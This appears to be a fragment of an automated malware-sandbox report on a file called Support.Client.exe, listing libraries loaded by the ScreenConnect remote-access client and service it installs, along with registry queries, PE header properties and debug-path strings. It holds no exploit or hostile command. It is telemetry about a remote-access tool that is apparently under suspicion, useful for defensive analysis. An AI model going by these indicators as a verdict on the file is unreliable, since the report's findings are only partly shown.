                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\Support.Client.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                  Source: Window Recorder; Window detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe; File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: Support.Client.exe; Static PE information: certificate valid
                  Source: Support.Client.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: Support.Client.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: Support.Client.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: Support.Client.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Support.Client.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: Support.Client.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: Support.Client.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2525404173.000002514097C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405FE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2135607585.0000000001272000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Support.Client.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AB0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140978000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405FA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2133716671.0000000002DA2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.2946951475.000000001B400000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.2939873486.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2124711251.0000000000A32000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.2129224859.000000000021D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140974000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405F6000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2138587457.000000001BDE2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2124711251.0000000000A32000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140974000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405F6000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2138587457.000000001BDE2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2525404173.000002514097C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405FE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2135607585.0000000001272000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140449000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2134375244.0000000005242000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
